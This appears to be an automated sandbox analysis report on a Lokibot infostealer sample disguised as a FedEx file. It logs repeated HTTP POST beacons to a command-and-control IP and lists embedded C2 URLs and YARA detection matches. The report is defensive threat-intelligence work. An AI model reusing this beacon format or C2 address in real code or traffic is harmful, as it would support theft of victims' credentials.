Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_00404ED4 recv,

3_2_00404ED4

Source: unknown

HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 192Connection: close

Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.137.215/index.php/comments/feed/
Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.137.215/index.php/feed/
Source: FedEx_776282383902.exe, 00000003.00000002.2465400980.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.61.137.215/index.php/t?id=090
Source: FedEx_776282383902.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: FedEx_776282383902.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: FedEx_776282383902.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: FedEx_776282383902.exe, FedEx_776282383902.exe, 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gmpg.org/xfn/11
Source: FedEx_776282383902.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_012CD2E4	0_2_012CD2E4
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_01490040	0_2_01490040
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_01490006	0_2_01490006
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_01492230	0_2_01492230
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_01490040	0_2_01490040
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_01493F98	0_2_01493F98
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06194758	0_2_06194758
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06193BF8	0_2_06193BF8
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06198900	0_2_06198900
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06193648	0_2_06193648
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06193647	0_2_06193647
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06194748	0_2_06194748
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_0619B553	0_2_0619B553
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_0619D0C8	0_2_0619D0C8
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_0619CC90	0_2_0619CC90
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_0619DA78	0_2_0619DA78
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_06193BE8	0_2_06193BE8
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_061988F0	0_2_061988F0
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_0619B990	0_2_0619B990
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 3_2_0040549C	3_2_0040549C
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 3_2_004029D4	3_2_004029D4

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: String function: 00405B6F appears 42 times

Source: FedEx_776282383902.exe

Static PE information: invalid certificate

Source: FedEx_776282383902.exe, 00000000.00000002.1217569536.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FedEx_776282383902.exe
Source: FedEx_776282383902.exe, 00000000.00000002.1218835843.00000000042D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FedEx_776282383902.exe
Source: FedEx_776282383902.exe, 00000000.00000002.1220838807.0000000007D90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs FedEx_776282383902.exe
Source: FedEx_776282383902.exe, 00000000.00000002.1220582421.0000000007638000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FedEx_776282383902.exe
Source: FedEx_776282383902.exe, 00000000.00000002.1218835843.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FedEx_776282383902.exe
Source: FedEx_776282383902.exe	Binary or memory string: OriginalFilenameKOqs.exe" vs FedEx_776282383902.exe

Source: FedEx_776282383902.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
